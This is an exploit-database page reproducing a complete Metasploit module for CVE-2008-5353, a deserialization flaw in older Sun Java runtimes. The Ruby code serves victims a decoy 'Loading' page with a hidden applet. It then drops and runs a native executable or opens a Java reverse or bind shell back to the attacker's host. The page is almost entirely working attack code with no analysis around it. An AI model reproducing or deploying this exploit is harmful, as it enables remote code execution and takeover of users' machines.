Sploitus

Sun Java Runtime and Development Kit <= 6 update 10 Calendar Deserialization Exploit

seebug Β· 2008-12-03

Exploit Code

ruby161 lines
## https://sploitus.com/exploit?id=SSV:18038
##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 &lt; Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML
	
	def initialize( info = {} )
	
		super( update_info( info,
			'Name'					=&gt; 'Sun Java Calendar Deserialization Exploit',
			'Description'		=&gt; %q{
				This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.
				
				The payload can be either a native payload which is generated as an executable and 
				dropped/executed on the target or a shell from within the Java applet in the target browser.
				
				The effected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 
				and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
			},
			'License'				=&gt; MSF_LICENSE,
			'Author'				=&gt; [ 'sf', 'hdm' ],
			'Version'       =&gt; '1',
			'References'		=&gt; 
			[
				[ 'CVE', '2008-5353' ],
				[ 'OSVDB', '50500'],
				[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
				[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
				[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
				[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ] 
			],
			'Platform'     =&gt; [ 'win', 'osx', 'linux', 'solaris' ],
			'Payload'      =&gt; { 'Space' =&gt; 2048, 'BadChars' =&gt; '', 'DisableNops' =&gt; true },
			'Targets'      =&gt;
				[
					[ 'Generic (Java Payload)', 
						{
							# This is a bad hack to force only the generic/shell_bind_tcp and generic/shell_reverse_tcp payloads
							'Platform' =&gt; ['win'],
							'Payload' =&gt; { 'Space' =&gt; 0 },
							'Arch' =&gt; ARCH_CMD,
						}
					],
					[ 'Windows x86 (Native Payload)', 
						{
							'Platform' =&gt; 'win',
							'Arch' =&gt; ARCH_X86,
						}
					],
					[ 'Mac OS X PPC (Native Payload)', 
						{
							'Platform' =&gt; 'osx',
							'Arch' =&gt; ARCH_PPC,
						}
					],
					[ 'Mac OS X x86 (Native Payload)', 
						{
							'Platform' =&gt; 'osx',
							'Arch' =&gt; ARCH_X86,
						}
					],
					[ 'Linux x86 (Native Payload)', 
						{
							'Platform' =&gt; 'linux',
							'Arch' =&gt; ARCH_X86, 
						}
					],
				],
			'DefaultTarget'	=&gt; 0
			))
	end


	def on_request_uri( cli, request )
		data = nil
		host = nil
		port = nil

		if not request.uri.match(/\.jar$/i)
			if not request.uri.match(/\/$/)
				send_redirect( cli, get_resource() + '/', '')
				return
			end
			
			print_status( &quot;Handling request from #{cli.peerhost}:#{cli.peerport}...&quot; )
			
			payload = regenerate_payload( cli )
			if not payload
				print_status( &quot;Failed to generate the payload.&quot; )
				return
			end
			
			if target.name == 'Generic (Java Payload)'
				if datastore['LHOST']
					host = datastore['LHOST']
					port = datastore['LPORT']
					print_status( &quot;Payload will be a Java reverse shell to #{host}:#{port} from #{cli.peerhost}...&quot; )
				else
					port = datastore['LPORT']
					datastore['RHOST'] = cli.peerhost
					print_status( &quot;Payload will be a Java bind shell on #{cli.peerhost}:#{port}...&quot; )
				end
			else
			
				if target['Arch'] == ARCH_X86
					data = Msf::Util::EXE.to_win32pe( framework, payload.encoded ) if target['Platform'] == 'win'
					data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' 
					data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux'
				elsif target['Arch'] == ARCH_PPC
					data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx'
				end
				
				if data
					print_status( &quot;Generated executable to drop (#{data.length} bytes).&quot; )
					data = Rex::Text.to_hex( data, prefix=&quot;&quot; )
				else
					print_status( &quot;Failed to generate the executable.&quot; )
					return
				end
				
			end
			
			send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' =&gt; 'text/html' } )	
			return
		end
		
		print_status( &quot;Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...&quot; )	
		send_response( cli, generate_jar(), { 'Content-Type' =&gt; &quot;application/octet-stream&quot; } )

		handler( cli )
	end
	
	def generate_html( data, host, port )
		html  = &quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;Loading, Please Wait...&lt;/title&gt;&lt;/head&gt;&quot;
		html += &quot;&lt;body&gt;&lt;center&gt;&lt;p&gt;Loading, Please Wait...&lt;/p&gt;&lt;/center&gt;&quot;
		html += &quot;&lt;applet archive=\&quot;Applet.jar\&quot; code=\&quot;msf.x.AppletX.class\&quot; width=\&quot;1\&quot; height=\&quot;1\&quot;&gt;&quot;
		html += &quot;&lt;param name=\&quot;data\&quot; value=\&quot;#{data}\&quot;/&gt;&quot; if data
		html += &quot;&lt;param name=\&quot;lhost\&quot; value=\&quot;#{host}\&quot;/&gt;&quot; if host
		html += &quot;&lt;param name=\&quot;lport\&quot; value=\&quot;#{port}\&quot;/&gt;&quot; if port
		html += &quot;&lt;/applet&gt;&lt;/body&gt;&lt;/html&gt;&quot;
		return html
	end
	
	def generate_jar()
		path = File.join( Msf::Config.install_root, &quot;data&quot;, &quot;exploits&quot;, &quot;CVE-2008-5353.jar&quot; )
		fd = File.open( path, &quot;rb&quot; )
		data = fd.read(fd.stat.size)
		fd.close
		return data
	end
	
end